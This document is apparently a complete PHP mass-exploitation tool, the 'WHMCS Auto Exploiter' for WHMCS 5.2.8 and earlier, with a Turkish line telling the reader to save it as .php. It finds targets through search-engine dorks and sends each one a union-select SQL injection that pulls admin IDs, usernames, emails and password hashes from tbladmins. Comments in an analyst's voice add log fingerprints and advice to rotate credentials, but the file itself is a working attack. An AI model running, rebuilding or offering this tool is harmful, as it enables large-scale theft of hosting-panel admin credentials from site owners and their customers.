kullanimi:.php olarak kaydedin.
Kod:
<!--
<!DOCTYPE html>
<html>
<head>
<title>WHMCS Auto Exploiter</title>
<style type="text/css">
body{
background-color: black;
color: white;
}
textarea{
margin: 0px; width: 680px;
height: 226px;
BORDER: dashed 1px #333;
BORDER-COLOR: #333333;
BACKGROUND-COLOR: Black;
color: #FFF;
margin-top: 30px;
}
input{
border: dashed 1px;
border-color: #333;
BACKGROUND-COLOR: Black;
font: 8pt Verdana;
color: Red;
}
</style><link rel="stylesheet" type="text/css" href="http://fonts.googleapis.com/css?family=Audiowide">
</head>
<body>
<font face="Audiowide" color="red">WHMCS Auto Xploiter <font color="green">(0day)</font>
<br><font color="white" size="4">[For WHMCS ver. <= </font><font color="green" size="4">5.2.8</font><font color="white" size="4">]</font></font>
<form method="post">
<textarea name="ids"></textarea><br>
<input type="submit" value="whmcs hunter" id="button">
</form>
<center>
<?php
// Silence every PHP notice, warning and error, so failed requests and
// undefined-variable conditions never appear in the page output or error display.
error_reporting(0);
// Remove the script execution time limit, so a single POST can keep a
// PHP worker busy for as long as the loops below run.
set_time_limit(0);
/**
 * Bundles the three stages of this tool: search-engine target discovery,
 * an SQL-injection request against a WHMCS ticket page, and HTML reporting.
 *
 * Analyst notes (all taken from the code below and the page banner):
 *  - The banner states the affected range as WHMCS <= 5.2.8. Installations in
 *    that range should be upgraded per vendor guidance (no advisory id is
 *    given on this page).
 *  - Request fingerprint: a POST whose body carries the array parameters
 *    `tid[sqltype]=TABLEJOIN` and `tid[value]=...union select...tbladmins`,
 *    sent with the User-Agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)".
 *  - The query selects id, username, email and password from `tbladmins`;
 *    if matching requests appear in access or WAF logs, treat admin
 *    credentials as exposed and rotate them.
 */
class shc_hotbot
{
/**
 * Pushes buffered output to the client so results appear while the
 * loops are still running.
 */
function letItBy(){
ob_flush(); flush();
}
/**
 * Splits a URL into named parts with a single regular expression.
 *
 * @param string $url URL text to split.
 * @return array preg_match() capture array: index 0 is the whole match,
 *               named keys are scheme, login, pass, host, subdomain, domain,
 *               extension, port, path, file, arg and anchor. The preg_match()
 *               return value is not checked, so the caller receives whatever
 *               $out holds when nothing matched.
 */
function parseUrl($url) {
$r = "^(?:(?P<scheme>\w+)://)?";
$r .= "(?:(?P<login>\w+):(?P<pass>\w+)@)?";
$r .= "(?P<host>(?:(?P<subdomain>[\w\.]+)\.)?" . "(?P<domain>\w+\.(?P<extension>\w+)))";
$r .= "(?::(?P<port>\d+))?";
$r .= "(?P<path>[\w/]*/(?P<file>\w+(?:\.\w+)?)?)?";
$r .= "(?:\?(?P<arg>[\w=&]+))?";
$r .= "(?:#(?P<anchor>\w+))?";
$r = "!$r!"; // Delimiters
preg_match ( $r, $url, $out );
return $out;
}
/**
 * Fetches the hotbot.com front page and returns the value found inside a
 * `.val('...')` call in the returned markup.
 *
 * Only search_hotbot() calls this. Neither the HTTP result nor the regex
 * match is checked before $ke[1] is returned.
 */
function keyvol(){
$ch = curl_init("http://www.hotbot.com/");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
preg_match("/\.val\('(.*?)'\);/",$result,$ke);
return $ke[1];
}
/**
 * Queries hotbot.com for a search string and collects the result URLs.
 *
 * The driver code in this file never calls this method; it calls
 * search_google() instead.
 *
 * Side effects visible here: progress text is echoed, and curl reads and
 * writes a `cookie.txt` file relative to the working directory.
 *
 * @param string $dork Search string; concatenated into the query URL as-is.
 * @return array|null Collected result strings ($array is never initialised,
 *                    so it is unset when nothing was collected).
 */
function search_hotbot($dork){
echo '[+] Search Target ... Pleas wait<br>';
$page = 1;
// $page is incremented inside the loop whenever a results page is processed,
// which is what keeps the loop condition true.
for ($i=0; $i<$page; $i++) {
$ch = curl_init();
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_URL,"http://www.hotbot.com/search/web?pn=".$page."&q=".$dork."&keyvol=".$this->keyvol());
curl_setopt($ch,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($ch,CURLOPT_COOKIEJAR,'cookie.txt');
// The request presents itself to the search engine with a crawler User-Agent string.
curl_setopt($ch,CURLOPT_USERAGENT,'msnbot/1.0 (+http://search.msn.com/msnbot.htm)');
curl_setopt($ch,CURLOPT_ENCODING,"gzip, deflate, compress");
$data = curl_exec($ch);
preg_match_all('#<span class="web-baseuri">(.*?)</span>#',$data,$matches);
preg_match('/<title>(.*?)<\\/title>/', $data, $titles);
$links = array_unique($matches[1]);
// A page titled exactly "Search" is treated as the end of the result set.
if($titles[1]=="Search"){
echo '[+] Search Target ... Done!<br>';
}else{
foreach ($links as $key) {
// Text scraped from the remote page is echoed without HTML escaping.
echo $key."<br>";
$array[] = $key;
}
$page++;
}
$this->letItBy();
}
return $array;
}
/**
 * Queries the Google AJAX web-search endpoint and turns each result into a
 * candidate `viewticket.php` URL.
 *
 * @param string $dork Search string (URL-encoded before use).
 * @return array De-duplicated candidate URLs. $array is never initialised, so
 *               array_unique() receives an unset variable when no result was
 *               processed.
 */
function search_google($dork){
$resultPerPage=8;
$page=1;
for ($i=0; $i <$page; $i++) {
$start = $page*$resultPerPage;
$url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($dork);
// The response is decoded without checking that the fetch or the JSON parse succeeded.
$resultFromGoogle = json_decode( file_get_contents($url, true) ,true);
if($resultFromGoogle['responseStatus']=="200"){
foreach ($resultFromGoogle['responseData']['results'] as $key => $value) {
$url = $this->parseUrl($value['unescapedUrl']);
// Swap the file component of the matched URL for viewticket.php; the
// result is used as a target without any further validation.
$url = str_replace($url['file'], "viewticket.php", $url[0]);
$array[] = $url;
}
$page++;
}
}
return array_unique($array);
}
/**
 * Sends the SQL-injection POST to one URL and extracts the marked-up rows
 * from the response.
 *
 * Detection notes:
 *  - The body is passed to curl as a plain string, so it is presumably sent
 *    exactly as written (raw spaces, parentheses and a trailing `#`).
 *  - `0x3a3a3a3a3a` is the hex form of ":::::"; each returned row is wrapped
 *    in that marker and its fields are joined with ":" (0x3a). A response
 *    containing ":::::" blocks is what this code treats as success.
 *  - TLS certificate verification is switched off and redirects are followed.
 *
 * @param string $site URL to send the request to.
 * @return array|false Strings captured between ":::::" markers, or false when
 *                     curl_init() failed or nothing was captured.
 */
function whmcs($site){
$post = "tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(0x3a3a3a3a3a,id,0x3a,username,0x3a,email,0x3a,password,0x3a3a3a3a3a) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0#";
$curl_connection = curl_init($site);
if($curl_connection != false) {
curl_setopt($curl_connection, CURLOPT_CONNECTTIMEOUT, 30);
// Fixed legacy-browser User-Agent; usable as a log-search pivot together
// with the `tid[sqltype]` parameter.
curl_setopt($curl_connection, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)");
curl_setopt($curl_connection, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl_connection, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($curl_connection, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($curl_connection, CURLOPT_POSTFIELDS, $post);
$source = curl_exec($curl_connection);
preg_match_all('/:::::(.*?):::::/s',$source,$infoz);
if($infoz[1]){
return $infoz[1];
}
}
return false;
}
/**
 * Runs whmcs() against every URL in $data and prints one HTML panel per URL:
 * green with the captured rows in a textarea, or red when nothing came back.
 *
 * Handling note for analysts: both the URL and the captured response text are
 * echoed without HTML escaping, so this page renders remote-controlled
 * content; review saved output as text, not in a browser.
 *
 * @param array $data URLs to test.
 */
function whmcs_exploit($data){
foreach ($data as $key => $values) {
$exploit = $this->whmcs($values);
if($exploit){
echo '<div style="background-color: green;"><pre><h4>Site : <a href="'.$values.'">'.$values.'</a></h4></pre><br><textarea>';
foreach ($exploit as $key => $value) {
echo $value."\r\n";
}
echo '</textarea></div>';
}else{
echo '
<div style="background-color: red;">
<pre><h4>Site : <a href="'.$values.'">'.$values.'</a></h4></pre>
</div>';
}
$this->letItBy();
}
}
}
// Driver: everything below runs on each request to this page.
$shc = new shc_hotbot();
// Disabled call; the class above defines no method named `search`.
//$data = $shc->search("inurl:submitticket.php");
// The `ids` textarea from the form is the only input. The page has no
// authentication or CSRF check, so anyone who can reach the file can drive it.
// NOTE(review): a file with this content under a web root should be handled
// as hostile tooling and the host triaged accordingly.
if($_POST['ids']){
// One search string per CRLF-separated line.
$anu = explode("\r\n", $_POST['ids']);
foreach ($anu as $key => $value) {
// Each line is used as a search query; every URL the search returns is
// then sent the injection request and reported.
$data = $shc->search_google($value);
$shc->whmcs_exploit($data);
$shc->letItBy();
}
}
?>
</center>
</body>
</html>